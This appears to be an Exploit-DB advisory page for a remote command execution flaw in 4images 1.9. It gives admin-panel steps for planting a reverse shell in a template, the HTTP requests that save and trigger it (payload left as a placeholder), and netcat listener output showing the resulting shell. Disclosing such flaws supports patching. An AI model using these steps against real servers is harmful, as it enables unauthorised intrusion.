header-logo
Suggest Exploit
vendor:
4images
by:
Andrey Stoykov
9.8
CVSS
CRITICAL
Remote Command Execution (RCE)
78
CWE
Product Name: 4images
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: YES
Related CWE:
CPE: 4images
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 20.04
2020

4images 1.9 – Remote Command Execution (RCE)

A vulnerability in 4images 1.9 allows an authenticated administrator user to execute arbitrary code on the server by uploading a malicious template. To exploit the vulnerability, an attacker must first login as an administrator user, then browse to General -> Edit Templates -> Select Template Pack -> default_960px -> Load Theme. The attacker then selects the template categories.html and inserts a reverse shell payload. After clicking Save Changes, the attacker browses to http://host/4images/categories.php?cat_id=3D1 and a reverse shell is established.

Mitigation:

Upgrade to the latest version of 4images 1.9 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

# Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.9
# Tested on: Ubuntu 20.04


To reproduce do the following:

1. Login as administrator user
2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d=
efault_960px" -> "Load Theme"
3. Select Template "categories.html"
4. Paste reverse shell code
5. Click "Save Changes"
6. Browse to "http://host/4images/categories.php?cat_id=3D1"


// HTTP POST request showing reverse shell payload

POST /4images/admin/templates.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]

__csrf=3Dc39b7dea0ff15442681362d2a583c7a9&action=3Dsavetemplate&content=3D[=
REVERSE_SHELL_CODE]&template_file_name=3Dcategories.html&template_folder=3D=
default_960px[...]



// HTTP redirect response to specific template

GET /4images/categories.php?cat_id=3D1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]


# nc -kvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43032
Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (20=
22-11-07) x86_64 GNU/Linux
 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
kali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessi=
on
kali     pts/1    -                11:58    1:40  24.60s  0.14s sudo su
uid=3D1(daemon) gid=3D1(daemon) groups=3D1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$=20





--sgnirk-7d26becc-c589-46c6-a348-fe09d4b162fe--

Navigation

Suggest Exploit

Services By CQR